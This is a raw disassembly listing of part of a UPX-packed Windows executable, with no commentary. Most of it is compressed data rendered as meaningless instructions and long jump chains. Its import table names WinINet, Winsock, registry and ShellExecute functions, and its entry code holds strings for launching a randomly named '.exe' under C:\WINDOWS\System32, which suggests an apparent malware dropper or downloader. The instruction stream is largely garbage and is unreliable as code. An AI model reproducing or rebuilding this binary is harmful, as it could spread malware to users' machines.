dd 0DEC35F0Ch, 4B674C4Dh, 4A7B4B11h, 0AB330D8Ah, 6B414849h
dd 0B0404740h, 4F75FB58h, 584D4E7Fh, 4C4A74FBh, 0E8E24A4Bh
dd 4849B042h, 81428B00h, 0B4EDD487h, 372BC3A1h, 392F2C3Eh
dd 35243D2Ah, 1AB98011h, 170B1703h, 24C724AFh, 0A0A0D3Bh
dd 1319C45Ah, 0BA42E6Dh, 0D2A2472h, 0FDCFE716h, 0C5B6F6Eh
dd 105CAA17h, 872B5848h
; ---------------------------------------------------------------------------
fld tbyte ptr [eax]
adc [ebx-71h], ah
wait
inc ebx
pop ds
push ss
or ebx, [edx+ecx]
adc cl, [eax]
jmp short loc_31427875
; ---------------------------------------------------------------------------
dd 1D5301CEh, 292B787Ah, 7E1955FEh, 1476277Eh, 2F4E5E35h
dd 271E3310h, 18B9315Bh, 4C3A6450h, 10872C2Dh, 6B73B84Fh
dd 263B582Bh, 0AD0E581Fh
; ---------------------------------------------------------------------------
locret_31427840: ; CODE XREF: UPX1:314278AA�j
retf
; ---------------------------------------------------------------------------
db 0CFh, 0EDh, 83h
dd 0F8200E43h, 0B05BCD4Ah, 41DC826h, 843F6263h, 5B21161Eh
dd 1EB6A6Fh, 4E4C130Bh, 3A780806h, 19C7581Bh, 0CFCDCE5Bh
dd 15636B20h, 0A5EF2A58h
db 0Ah
; ---------------------------------------------------------------------------
loc_31427875: ; CODE XREF: UPX1:3142780E�j
dec edi
into
int 3 ; Trap to Debugger
js short near ptr loc_314278F4+1
cmp al, 98h
pop eax
jbe short loc_3142789D
push edi
enter 35Dh, 96h
pop ds
adc eax, 5C1B52D4h
sbb esp, [ebx]
pushf
mov ds:0C115AC7h, al
add [eax+35h], ebx
sbb [esi], edx
; ---------------------------------------------------------------------------
db 66h
dd 0D449C062h
db 79h
; ---------------------------------------------------------------------------
loc_3142789D: ; CODE XREF: UPX1:3142787D�j
insd
pop eax
or al, 0F1h
setalc
push edx
push edx
mov esp, 0F485EAC3h
inc eax
jns short locret_31427840
db 3Eh
or bl, ds:887E741Dh
mov ds:3F75815Bh, eax ; CODE XREF: UPX1:314278D9�j
sbb eax, 0FF17350Ch
daa
repne out dx, eax
call far ptr 1519h:36133E1Dh
adc [ecx+14h], bh
or ecx, [ebx+eax]
xchg eax, edi
bound edi, [eax+72ED1B0Ah]
cmp edx, [edi]
or [ecx], al
popa
jb short near ptr loc_314278B3+4
or [edi], dl
stc
fnstcw word ptr ds:364A1D00h
mov es, word ptr [edi+172C042Ah]
pop ss
adc al, 1Fh
or [ebx+4Ah], cl
sub edx, [esi]
sbb [eax], ecx
loc_314278F4: ; CODE XREF: UPX1:31427878�j
or edx, [eax]
pop ss
or al, 61h
movsd
aad 35h
repne in al, 6Ah
dec edx
or cl, [ebx]
ja short loc_31427930
jge short loc_31427911
aad 6Ch
test dword ptr [ebp+54h], 837DCE60h
clc
pop ecx
loc_31427911: ; CODE XREF: UPX1:31427904�j
db 36h
sbb eax, 19110C00h
cmp ds:3D665927h[eax*4], ebp
push cs
ja short loc_31427934
sbb [ecx], edx
or al, 3Eh
pop ss
or ch, [ebx]
pop ecx
retn 0CE8Eh
; ---------------------------------------------------------------------------
dd 37031F44h
; ---------------------------------------------------------------------------
loc_31427930: ; CODE XREF: UPX1:31427902�j
sbb dl, [edx]
push cs
push esp
loc_31427934: ; CODE XREF: UPX1:3142791F�j
cmp al, 99h
shl dword ptr [ecx-0AA5DD45h], 0Ah
adc [ebx+42h], esi
out dx, eax
xchg eax, esp
; ---------------------------------------------------------------------------
dw 0C7C5h
db 0B0h ; °
db 0Bh, 1Dh, 30h
db 19h
db 16h, 1Ch, 74h
db 3Fh ; ?
db 5Ch, 26h, 0BAh
db 0C5h ; Å
db 0BBh, 0CEh, 70h
db 16h
db 0AAh, 19h, 22h
db 88h ; ˆ
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
dw 0CDB5h
db 69h ; i
db 0EFh, 3Ch, 0DBh
db 2Eh ; .
db 1Ch, 1, 6Ch
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0Dh, 0A7h, 0CEh
db 34h ; 4
db 0E0h, 19h, 53h
db 31h ; 1
db 16h, 1Eh, 17h
db 77h ; w
db 2Bh, 71h, 1Dh
db 8
db 7Eh, 0F8h, 4Fh
db 60h ; `
db 1Ah, 31h, 0E4h
; ---------------------------------------------------------------------------
pop esi
adc ebx, ds:0A1F03D1Ch
sbb al, 0CBh
push eax
retf
; ---------------------------------------------------------------------------
db 16h
db 4Eh ; N
db 83h, 9Fh, 0EAh
db 0B5h ; µ
db 0A8h, 98h, 6Ah
db 73h ; s
db 39h, 2 dup(1Ch)
db 0Ah
db 77h, 0CBh, 8Fh
db 65h ; e
db 69h, 73h, 34h
db 11h
db 1Ah, 0Ah, 19h
db 1Fh
db 0CDh, 0F2h, 9Eh
db 0A2h ; ¢
db 18h, 53h, 35h
db 0FAh ; ú
db 4, 6Bh, 4Eh
db 73h ; s
db 70h, 0B3h, 0ADh
db 0F6h ; ö
db 0B7h, 1Bh, 0BBh
db 0A2h ; ¢
db 3Ah, 3, 2Ch
db 11h
db 0F9h, 0F0h, 0Dh
db 1Dh
db 0A6h, 6Dh, 31h
db 0A0h ;
db 0F2h, 35h, 91h
db 0
db 4Ch, 0A2h, 63h
db 4Eh ; N
db 0E3h, 0AAh, 75h
db 25h ; %
db 0BCh, 41h, 8Ah
; ---------------------------------------------------------------------------
push 1A37691Eh
and bh, ds:1955CE00h
retf
; ---------------------------------------------------------------------------
db 49h ; I
db 0A7h, 72h, 1Bh
db 6Bh ; k
db 15h, 0E6h, 0E3h
db 98h ; ˜
db 0BEh, 55h, 2Ah
db 63h ; c
db 21h, 3, 70h
db 98h ; ˜
db 0B8h, 1Eh, 6Fh
db 0FEh ; þ
db 2, 1Dh, 40h
db 0DFh ; ß
db 34h, 18h, 0DBh
db 0CDh ; Í
db 0FDh, 6Dh, 3Dh
; ---------------------------------------------------------------------------
test [ebx-181A56E8h], bh
or eax, 1F42534Bh
fnstenv byte ptr [ebx]
sbb eax, 94433D01h
cmp [esi+77B9FE68h], dh
sub [edx-48h], esi
db 26h
mov edx, 0E6698E22h
dec eax
jmp dword ptr [ecx]
; ---------------------------------------------------------------------------
db 14h
db 3Ah, 9Fh, 59h
db 68h ; h
db 98h, 64h, 0FCh
db 0Eh
db 3, 29h, 74h
db 39h ; 9
db 1Ah, 16h, 0C6h
db 2Bh ; +
db 10h, 53h, 76h
db 0DDh ; Ý
db 50h, 7Ch, 49h
db 0FEh ; þ
db 47h, 0B9h, 62h
; ---------------------------------------------------------------------------
std
mov eax, ds:68F14E0Fh
retn
; ---------------------------------------------------------------------------
db 1Ah
db 0CEh ; Î
db 5, 72h, 3Ch
db 6Ah ; j
db 19h, 76h, 0Ah
db 11h
db 1Eh, 63h, 0AEh
db 42h ; B
db 0CEh, 1, 0B2h
db 1Fh
db 0F7h, 0Dh, 53h
db 4Eh ; N
db 14h, 17h, 19h
db 17h
db 3Bh, 0B6h, 17h
db 1
db 54h, 69h, 17h
db 28h ; (
db 5Bh, 8, 1Fh
db 68h ; h
db 2Ah, 0F7h, 76h
db 0E8h ; è
db 47h, 8Eh, 40h
db 0A8h ; ¨
align 2
dw 396Ch
; ---------------------------------------------------------------------------
sbb ecx, [ecx]
or eax, 0D6080A11h
or al, 0A0h
xor eax, 42D84D31h
dec esi
mov ebx, 0A66B21DFh
xchg eax, esp
or ecx, [edx]
mov dl, 7Eh
adc eax, 0A9B660C9h
retf 764Dh
; ---------------------------------------------------------------------------
db 0EAh, 77h, 6Dh
db 0A2h ; ¢
db 0E1h, 13h, 2Bh
db 35h ; 5
db 65h, 27h, 3Ch
db 20h
db 0BDh, 72h, 0Ch
db 0C0h ; À
db 47h, 27h, 10h
db 8Eh ; Ž
db 81h, 5Fh, 4Eh
db 0A3h ; £
db 3Eh, 0B4h, 7Ah
db 7Fh ;
db 1, 0Ah, 37h
db 91h ; ‘
db 68h, 79h, 0F0h
db 6Dh ; m
db 0D5h, 18h, 0E9h
db 5Ah ; Z
db 55h, 0B4h, 79h
db 4Ch ; L
db 0B5h, 65h, 5Fh
db 1Dh
; ---------------------------------------------------------------------------
jbe short loc_31427B34
sbb [edx+726C4E54h], edi
lahf
int 3 ; Trap to Debugger
retn
; ---------------------------------------------------------------------------
dd 317E966Dh, 80B0F1Eh, 391EC97Dh, 0E41AFB37h, 7C5C8C1Eh
dd 0A3191422h, 0E32DFD3Bh, 4F766939h, 1F7D5954h, 63FE136Ch
dd 167B7EDEh, 0C2B3B31h, 0F4ED76F9h, 753F621Dh, 0D095CAB3h
dd 7A0B87D9h, 5479757Ah, 4154CAB3h, 746F4C17h, 0CAB354CAh
dd 686B7C71h, 373DD26Eh, 3D284ED2h, 9C87CE76h, 21B0EECFh
; ---------------------------------------------------------------------------
loc_31427B34: ; CODE XREF: UPX1:31427AC5�j
mov al, ds:78987838h
ja short near ptr loc_31427BB3+1
jnb short loc_31427BB6
jle short loc_31427BB3
pop esi
retf 7964h
; ---------------------------------------------------------------------------
adc [edx-5Ch], ch
loc_31427B46: ; CODE XREF: UPX1:31427B76�j
dec esp
pop ebx
push 76BEDB5Dh
cmp cl, [ecx+73h]
jp short loc_31427B84
dec ebx
iret
; ---------------------------------------------------------------------------
dd 747FE3DCh, 414C6618h, 68C84E33h, 552F7E7Fh, 1A68F825h
dd 41C71F4h, 0C8D6493Dh
db 79h, 66h, 56h
; ---------------------------------------------------------------------------
loc_31427B73: ; CODE XREF: UPX1:31427BCE�j
adc bh, al
stc
jnz short loc_31427B46
ficomp word ptr [eax+ebp*8+5Eh]
mov esp, 0E804031Ch
out 7Ch, eax
cwde
loc_31427B84: ; CODE XREF: UPX1:31427B50�j
push esi
sbb al, 99h
sub dword ptr [ecx+ebx*8+23h], 0FFFFFFA0h
dec edi
jg short loc_31427BE1
pop edi
outsb
mov eax, 33987830h
cmp edi, ecx
push edi
mov ebx, 7878782Ch
js short loc_31427C18
js short near ptr loc_31427C18+2
js short near ptr loc_31427C1B+1
call near ptr 0A9BAF430h
js short near ptr loc_31427C1B+8
js short loc_31427C25
js short near ptr loc_31427C25+2
js short near ptr loc_31427BC6+3
; ---------------------------------------------------------------------------
db 0C6h, 78h
; ---------------------------------------------------------------------------
loc_31427BB3: ; CODE XREF: UPX1:31427B3D�j
; UPX1:31427B39�j
sbb [edx], bh
loc_31427BB5: ; CODE XREF: UPX1:31427C10�j
dec ecx
loc_31427BB6: ; CODE XREF: UPX1:31427B3B�j
cmc
mov byte ptr [eax-38h], 87h
xchg ebp, [edi]
sti
mov ch, 87h
xchg eax, ebx
push 0E8E8E8E8h
loc_31427BC6: ; CODE XREF: UPX1:31427BAF�j
call near ptr 6FC16EB3h
lock jg short near ptr loc_31427C0A+3
jns short loc_31427B73
or eax, 0FB66F37Fh
xchg eax, esi
test [ecx-5Dh], ch
or dl, [ebp+787879C0h] ; CODE XREF: UPX1:31427C4E�j
js short near ptr loc_31427C59+1
loc_31427BE1: ; CODE XREF: UPX1:31427B8D�j
mov ds:66F37F0Dh, eax
sti
xchg eax, esi
test [ecx-5Dh], ch
imul edi, [eax-68F45C87h], 66F3710Dh
sti
xchg eax, esi
test [ecx-5Dh], ch ; CODE XREF: UPX1:31427C05�j
or ebx, [ecx+ecx*2+7B90FBB1h]
or dh, [ebp-47h]
cwde
jo short near ptr loc_31427BF7+2
jle short loc_31427C47
sti
loc_31427C0A: ; CODE XREF: UPX1:31427BCB�j
mov [edi-420EF3F4h], al
jns short loc_31427BB5
or eax, 0FB66F37Fh
xchg eax, esi
loc_31427C18: ; CODE XREF: UPX1:31427B9E�j
; UPX1:31427BA0�j
test [ecx-5Dh], ch
loc_31427C1B: ; CODE XREF: UPX1:31427BA2�j
; UPX1:31427BA9�j
imul esi, [ecx+7F0DA379h], 96FB66F3h
loc_31427C25: ; CODE XREF: UPX1:31427BAB�j
; UPX1:31427BAD�j
test [ecx-5Dh], ch
imul esi, [ecx+7939580Dh], 0F37F0DA3h
db 66h
sti
xchg eax, esi
loc_31427C35: ; CODE XREF: UPX1:loc_31427CAB�j
test [ecx-5Dh], ch
imul esi, [ecx-68F45C87h], 66F3710Dh
sti
xchg eax, esi
test [ecx-5Dh], ch
loc_31427C47: ; CODE XREF: UPX1:31427C07�j
or ebx, [ebx+edi*8-7A068547h]
js short near ptr loc_31427BD9+2
xchg eax, [edi-0A865605h]
insb
push edi
sti
loc_31427C59: ; CODE XREF: UPX1:loc_31427CCC�j
; UPX1:31427BDF�j
test [esi+ecx+3A7AF277h], eax
lock jg short near ptr loc_31427CA1+1
xor ds:871B918Fh, ecx
xchg eax, [edi-4850C18h]
mov edx, 0FB7FF17Ch
mov edi, 7C91FB7Ch
jns near ptr 65D433F8h
xchg eax, [edi-700ED979h]
rol dword ptr [esi], 78h
js short loc_31427D02
repne jg short loc_31427CCC
push esp
nop
inc esp
jns short loc_31427CA1
; ---------------------------------------------------------------------------
dw 0F88Fh
db 47h, 79h
; ---------------------------------------------------------------------------
loc_31427C96: ; CODE XREF: UPX1:31427CDC�j
or eax, 0F27FF38Ah
daa
jl short loc_31427CBC
; ---------------------------------------------------------------------------
dw 90B9h
db 70h
; ---------------------------------------------------------------------------
loc_31427CA1: ; CODE XREF: UPX1:31427C90�j
; UPX1:31427C60�j
mov ecx, 0BCFE68B8h
push ecx
cmp al, 93h
nop
loc_31427CAB: ; CODE XREF: UPX1:31427CAE�j
jns short loc_31427C35
icebp
jg short loc_31427CAB
loc_31427CB0: ; CODE XREF: UPX1:31427CF6�j
mov edi, 9AA0F17Dh
mov eax, ds:2878C6F5h
js short near ptr loc_31427D33+1 ; CODE XREF: UPX1:31427CC4�j
loc_31427CBC: ; CODE XREF: UPX1:31427C9C�j
rep jg short near ptr loc_31427D2F+1
mov eax, 27F33D0Ch
jl short near ptr loc_31427CBA+1
cld
dec eax
js short near ptr loc_31427CD0+2
js short near ptr loc_31427D43+1
loc_31427CCC: ; CODE XREF: UPX1:31427C8A�j
jns short loc_31427C59
sub bl, bh
loc_31427CD0: ; CODE XREF: UPX1:31427CC8�j
mov edi, 0F4EE8770h
or [eax+78h], bh
in eax, dx
repne jg short loc_31427D1B
jo short loc_31427C96
or al, 0A4h
icebp
add dword ptr [ecx], 7FCF777Fh
aas
sub [edi], bh
shr dword ptr [edi], 30h
mov dl, dh
sub eax, 8E8EE87h
js short near ptr loc_31427D6D+1
jno short loc_31427CB0
loc_31427CF8: ; CODE XREF: UPX1:31427CFB�j
or al, 7Fh
icebp
jnp short loc_31427CF8
mov ebx, 87A0937Ch
loc_31427D02: ; CODE XREF: UPX1:31427C88�j
out dx, al
in al, dx
or [eax+78h], bh
sbb [ecx-787821A1h], edx
js short loc_31427D87
js short loc_31427D89
js short loc_31427D8B
js short loc_31427D8D
js short loc_31427D8F
js short loc_31427D91
js short loc_31427D93
loc_31427D1B: ; CODE XREF: UPX1:31427CD9�j
js short loc_31427D95
js short loc_31427D97
js short loc_31427D99
js short loc_31427D9B
js short loc_31427D9D
js short loc_31427D9F
js short loc_31427DA1
js short loc_31427DA3
js short loc_31427DA5
js short loc_31427DA7
loc_31427D2F: ; CODE XREF: UPX1:loc_31427CBC�j
js short loc_31427DA9
js short loc_31427DAB
loc_31427D33: ; CODE XREF: UPX1:loc_31427CBA�j
js short loc_31427DAD
js short loc_31427DAF
js short loc_31427DB1
js short loc_31427DB3
js short loc_31427DB5
js short loc_31427DB7
js short loc_31427DB9
js short loc_31427DBB
loc_31427D43: ; CODE XREF: UPX1:31427CCA�j
js short loc_31427DBD
js short loc_31427DBF
js short loc_31427DC1
js short loc_31427DC3
js short loc_31427DC5
js short loc_31427DC7
js short loc_31427DC9
js short loc_31427DCB
js short loc_31427DCD
js short loc_31427DCF
js short loc_31427DD1
js short loc_31427DD3
js short loc_31427DD5
js short loc_31427DD7
js short loc_31427DD9
js short loc_31427DDB
js short loc_31427DDD
js short loc_31427DDF
js short loc_31427DE1
js short loc_31427DE3
js short loc_31427DE5
loc_31427D6D: ; CODE XREF: UPX1:31427CF4�j
js short loc_31427DE7
js short loc_31427DE9
js short loc_31427DEB
js short loc_31427DED
js short loc_31427DEF
js short loc_31427DF1
js short loc_31427DF3
js short loc_31427DF5
js short loc_31427DF7
js short loc_31427DF9
js short loc_31427DFB
js short loc_31427DFD
js short loc_31427DFF
loc_31427D87: ; CODE XREF: UPX1:31427D0D�j
js short near ptr byte_31427E01
loc_31427D89: ; CODE XREF: UPX1:31427D0F�j
js short near ptr byte_31427E03
loc_31427D8B: ; CODE XREF: UPX1:31427D11�j
js short near ptr byte_31427E05
loc_31427D8D: ; CODE XREF: UPX1:31427D13�j
js short near ptr byte_31427E07
loc_31427D8F: ; CODE XREF: UPX1:31427D15�j
js short near ptr byte_31427E09
loc_31427D91: ; CODE XREF: UPX1:31427D17�j
js short near ptr byte_31427E0B
loc_31427D93: ; CODE XREF: UPX1:31427D19�j
js short near ptr byte_31427E0D
loc_31427D95: ; CODE XREF: UPX1:loc_31427D1B�j
js short near ptr byte_31427E0F
loc_31427D97: ; CODE XREF: UPX1:31427D1D�j
js short near ptr byte_31427E11
loc_31427D99: ; CODE XREF: UPX1:31427D1F�j
js short near ptr byte_31427E13
loc_31427D9B: ; CODE XREF: UPX1:31427D21�j
js short near ptr byte_31427E15
loc_31427D9D: ; CODE XREF: UPX1:31427D23�j
js short near ptr byte_31427E17
loc_31427D9F: ; CODE XREF: UPX1:31427D25�j
js short near ptr byte_31427E19
loc_31427DA1: ; CODE XREF: UPX1:31427D27�j
js short near ptr byte_31427E1B
loc_31427DA3: ; CODE XREF: UPX1:31427D29�j
js short near ptr byte_31427E1D
loc_31427DA5: ; CODE XREF: UPX1:31427D2B�j
js short near ptr byte_31427E1F
loc_31427DA7: ; CODE XREF: UPX1:31427D2D�j
js short near ptr byte_31427E21
loc_31427DA9: ; CODE XREF: UPX1:loc_31427D2F�j
js short near ptr byte_31427E23
loc_31427DAB: ; CODE XREF: UPX1:31427D31�j
js short near ptr byte_31427E25
loc_31427DAD: ; CODE XREF: UPX1:loc_31427D33�j
js short near ptr byte_31427E27
loc_31427DAF: ; CODE XREF: UPX1:31427D35�j
js short near ptr byte_31427E29
loc_31427DB1: ; CODE XREF: UPX1:31427D37�j
js short near ptr byte_31427E2B
loc_31427DB3: ; CODE XREF: UPX1:31427D39�j
js short near ptr byte_31427E2D
loc_31427DB5: ; CODE XREF: UPX1:31427D3B�j
js short near ptr byte_31427E2F
loc_31427DB7: ; CODE XREF: UPX1:31427D3D�j
js short near ptr byte_31427E31
loc_31427DB9: ; CODE XREF: UPX1:31427D3F�j
js short near ptr byte_31427E33
loc_31427DBB: ; CODE XREF: UPX1:31427D41�j
js short near ptr byte_31427E35
loc_31427DBD: ; CODE XREF: UPX1:loc_31427D43�j
js short near ptr byte_31427E37
loc_31427DBF: ; CODE XREF: UPX1:31427D45�j
js short near ptr byte_31427E39
loc_31427DC1: ; CODE XREF: UPX1:31427D47�j
js short near ptr byte_31427E3B
loc_31427DC3: ; CODE XREF: UPX1:31427D49�j
js short near ptr byte_31427E3D
loc_31427DC5: ; CODE XREF: UPX1:31427D4B�j
js short near ptr byte_31427E3F
loc_31427DC7: ; CODE XREF: UPX1:31427D4D�j
js short near ptr byte_31427E41
loc_31427DC9: ; CODE XREF: UPX1:31427D4F�j
js short near ptr byte_31427E43
loc_31427DCB: ; CODE XREF: UPX1:31427D51�j
js short near ptr byte_31427E45
loc_31427DCD: ; CODE XREF: UPX1:31427D53�j
js short near ptr byte_31427E47
loc_31427DCF: ; CODE XREF: UPX1:31427D55�j
js short near ptr byte_31427E49
loc_31427DD1: ; CODE XREF: UPX1:31427D57�j
js short near ptr byte_31427E4B
loc_31427DD3: ; CODE XREF: UPX1:31427D59�j
js short near ptr byte_31427E4D
loc_31427DD5: ; CODE XREF: UPX1:31427D5B�j
js short near ptr byte_31427E4F
loc_31427DD7: ; CODE XREF: UPX1:31427D5D�j
js short near ptr byte_31427E51
loc_31427DD9: ; CODE XREF: UPX1:31427D5F�j
js short near ptr byte_31427E53
loc_31427DDB: ; CODE XREF: UPX1:31427D61�j
js short near ptr byte_31427E55
loc_31427DDD: ; CODE XREF: UPX1:31427D63�j
js short near ptr byte_31427E57
loc_31427DDF: ; CODE XREF: UPX1:31427D65�j
js short near ptr byte_31427E59
loc_31427DE1: ; CODE XREF: UPX1:31427D67�j
js short near ptr byte_31427E5B
loc_31427DE3: ; CODE XREF: UPX1:31427D69�j
js short near ptr byte_31427E5D
loc_31427DE5: ; CODE XREF: UPX1:31427D6B�j
js short near ptr byte_31427E5F
loc_31427DE7: ; CODE XREF: UPX1:loc_31427D6D�j
js short near ptr byte_31427E61
loc_31427DE9: ; CODE XREF: UPX1:31427D6F�j
js short near ptr byte_31427E63
loc_31427DEB: ; CODE XREF: UPX1:31427D71�j
js short near ptr byte_31427E65
loc_31427DED: ; CODE XREF: UPX1:31427D73�j
js short near ptr byte_31427E67
loc_31427DEF: ; CODE XREF: UPX1:31427D75�j
js short near ptr byte_31427E69
loc_31427DF1: ; CODE XREF: UPX1:31427D77�j
js short near ptr byte_31427E6B
loc_31427DF3: ; CODE XREF: UPX1:31427D79�j
js short near ptr byte_31427E6D
loc_31427DF5: ; CODE XREF: UPX1:31427D7B�j
js short near ptr byte_31427E6F
loc_31427DF7: ; CODE XREF: UPX1:31427D7D�j
js short near ptr byte_31427E71
loc_31427DF9: ; CODE XREF: UPX1:31427D7F�j
js short near ptr byte_31427E73
loc_31427DFB: ; CODE XREF: UPX1:31427D81�j
js short near ptr byte_31427E75
loc_31427DFD: ; CODE XREF: UPX1:31427D83�j
js short near ptr byte_31427E77
loc_31427DFF: ; CODE XREF: UPX1:31427D85�j
js short $+2
; ---------------------------------------------------------------------------
byte_31427E01 db 2 dup(0) ; CODE XREF: UPX1:loc_31427D87�j
byte_31427E03 db 0 ; CODE XREF: UPX1:loc_31427D89�j
db 0
byte_31427E05 db 2 dup(0) ; CODE XREF: UPX1:loc_31427D8B�j
byte_31427E07 db 0 ; CODE XREF: UPX1:loc_31427D8D�j
db 0
byte_31427E09 db 2 dup(0) ; CODE XREF: UPX1:loc_31427D8F�j
byte_31427E0B db 0 ; CODE XREF: UPX1:loc_31427D91�j
db 0
byte_31427E0D db 2 dup(0) ; CODE XREF: UPX1:loc_31427D93�j
byte_31427E0F db 0 ; CODE XREF: UPX1:loc_31427D95�j
db 0
byte_31427E11 db 2 dup(0) ; CODE XREF: UPX1:loc_31427D97�j
byte_31427E13 db 0 ; CODE XREF: UPX1:loc_31427D99�j
db 0
byte_31427E15 db 2 dup(0) ; CODE XREF: UPX1:loc_31427D9B�j
byte_31427E17 db 0 ; CODE XREF: UPX1:loc_31427D9D�j
db 0
byte_31427E19 db 2 dup(0) ; CODE XREF: UPX1:loc_31427D9F�j
byte_31427E1B db 0 ; CODE XREF: UPX1:loc_31427DA1�j
db 0
byte_31427E1D db 2 dup(0) ; CODE XREF: UPX1:loc_31427DA3�j
byte_31427E1F db 0 ; CODE XREF: UPX1:loc_31427DA5�j
db 0
byte_31427E21 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DA7�j
byte_31427E23 db 0 ; CODE XREF: UPX1:loc_31427DA9�j
db 0
byte_31427E25 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DAB�j
byte_31427E27 db 0 ; CODE XREF: UPX1:loc_31427DAD�j
db 0
byte_31427E29 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DAF�j
byte_31427E2B db 0 ; CODE XREF: UPX1:loc_31427DB1�j
db 0
byte_31427E2D db 2 dup(0) ; CODE XREF: UPX1:loc_31427DB3�j
byte_31427E2F db 0 ; CODE XREF: UPX1:loc_31427DB5�j
db 0
byte_31427E31 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DB7�j
byte_31427E33 db 0 ; CODE XREF: UPX1:loc_31427DB9�j
db 0
byte_31427E35 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DBB�j
byte_31427E37 db 0 ; CODE XREF: UPX1:loc_31427DBD�j
db 0
byte_31427E39 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DBF�j
byte_31427E3B db 0 ; CODE XREF: UPX1:loc_31427DC1�j
db 0
byte_31427E3D db 2 dup(0) ; CODE XREF: UPX1:loc_31427DC3�j
byte_31427E3F db 0 ; CODE XREF: UPX1:loc_31427DC5�j
db 0
byte_31427E41 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DC7�j
byte_31427E43 db 0 ; CODE XREF: UPX1:loc_31427DC9�j
db 0
byte_31427E45 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DCB�j
byte_31427E47 db 0 ; CODE XREF: UPX1:loc_31427DCD�j
db 0
byte_31427E49 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DCF�j
byte_31427E4B db 0 ; CODE XREF: UPX1:loc_31427DD1�j
db 0
byte_31427E4D db 2 dup(0) ; CODE XREF: UPX1:loc_31427DD3�j
byte_31427E4F db 0 ; CODE XREF: UPX1:loc_31427DD5�j
db 0
byte_31427E51 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DD7�j
byte_31427E53 db 0 ; CODE XREF: UPX1:loc_31427DD9�j
db 0
byte_31427E55 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DDB�j
byte_31427E57 db 0 ; CODE XREF: UPX1:loc_31427DDD�j
db 0
byte_31427E59 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DDF�j
byte_31427E5B db 0 ; CODE XREF: UPX1:loc_31427DE1�j
db 0
byte_31427E5D db 2 dup(0) ; CODE XREF: UPX1:loc_31427DE3�j
byte_31427E5F db 0 ; CODE XREF: UPX1:loc_31427DE5�j
db 0
byte_31427E61 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DE7�j
byte_31427E63 db 0 ; CODE XREF: UPX1:loc_31427DE9�j
db 0
byte_31427E65 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DEB�j
byte_31427E67 db 0 ; CODE XREF: UPX1:loc_31427DED�j
db 0
byte_31427E69 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DEF�j
byte_31427E6B db 0 ; CODE XREF: UPX1:loc_31427DF1�j
db 0
byte_31427E6D db 2 dup(0) ; CODE XREF: UPX1:loc_31427DF3�j
byte_31427E6F db 0 ; CODE XREF: UPX1:loc_31427DF5�j
db 0
byte_31427E71 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DF7�j
byte_31427E73 db 0 ; CODE XREF: UPX1:loc_31427DF9�j
db 0
byte_31427E75 db 2 dup(0) ; CODE XREF: UPX1:loc_31427DFB�j
byte_31427E77 db 0 ; CODE XREF: UPX1:loc_31427DFD�j
align 200h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00008000
; Flags E00000E0: Text Data Bss Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dword_31428200 dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
; DATA XREF: start+7F�o
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h
db 78h
; =============== S U B R O U T I N E =======================================
public start
start proc near
; FUNCTION CHUNK AT 314282F8 SIZE 00000017 BYTES
call near ptr loc_314282DC+1
jnb short loc_314282F8
db 65h
insb
insb
xor esi, [edx]
db 2Eh, 64h
insb
insb
add [ebx+68h], dl
db 65h
insb
insb
inc ebp
js short near ptr loc_31428306+1
arpl [ebp+74h], si
db 65h
inc ecx
add [ebx+3Ah], al
pop esp
push edi
dec ecx
dec esi
inc esp
dec edi
push edi
push ebx
pop esp
push ebx
jns short near ptr byte_31428329
jz short near ptr byte_3142831D
insd
xor esi, [edx]
pop esp
inc ecx
popa
xor [ebx+31h], ecx
dec ebx
aaa
aaa
db 2Eh, 65h
js short near ptr byte_3142832D
add [eax+49h], cl
dec edx
dec ebx
dec esp
dec ebp
dec esi
dec edi
